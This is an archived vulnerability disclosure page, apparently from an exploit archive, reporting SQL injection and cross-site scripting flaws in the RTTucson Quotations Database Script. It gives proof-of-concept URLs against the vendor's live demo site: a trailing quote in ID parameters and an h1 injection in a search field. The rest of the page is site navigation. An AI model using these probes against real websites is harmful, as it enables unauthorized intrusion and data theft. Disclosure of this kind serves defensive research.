RTTucson Quotations Database Script XSS / SQL Injection

RTTucson Quotations Database Script XSS / SQL Injection: Posted Feb 19, 2013; Authored by 3spi0n; RTTucson Quotations Database Script suffers from remote SQL injection and cross site scripting vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | e5827e24c69396c14e4480fd2c50f3fe2ce11d0b285b3482dd4d59c0272dcc18; Download | Favorite | View

RTTucson Quotations Database Script XSS / SQL Injection

##################################################################################
       __            _                      _            ____            
      / /___ _____  (_)_____________ ______(_)__  _____ / __ \_________ _
 __  / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__  |__  ) /_/ / /  / /  __(__  )/ /_/ / /  / /_/ / 
\____/\__,_/_/ /_/_/____/____/\__,_/_/  /_/\___/____(_)____/_/   \__, /  
                                                                /____/   
##################################################################################                                
RTTucson Quotations Database Script, Multiple Vulnerabilities
Software Page: http://www.rttucson.com/index.html
Script Demo: http://www.rttucson.com/quotations/default.php

Author(Pentester): 3spi0n
On Social: Twitter.Com/eyyamgudeer
Greetz: Grayhatz Inc. and Janissaries Platform.
##################################################################################

[~] MySQL Injection on Demo Site 

[+] (author.php, ID Param)
>>> http://www.rttucson.com/quotations/author.php?ID=5' (MySQLi Found)

[+] (category_quotes.php, ID Param)
>>> http://www.rttucson.com/quotations/category_quotes.php?ID=9' (MySQLi Found)

[~] XSS on Demo Site

>> (quote_search.php, keywords Param)
>>> http://www.rttucson.com/quotations/quote_search.php?keywords=<h1>Xssed-3spi0n</h1>

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

RTTucson Quotations Database Script XSS / SQL Injection

RTTucson Quotations Database Script XSS / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

RTTucson Quotations Database Script XSS / SQL Injection

Share This

RTTucson Quotations Database Script XSS / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems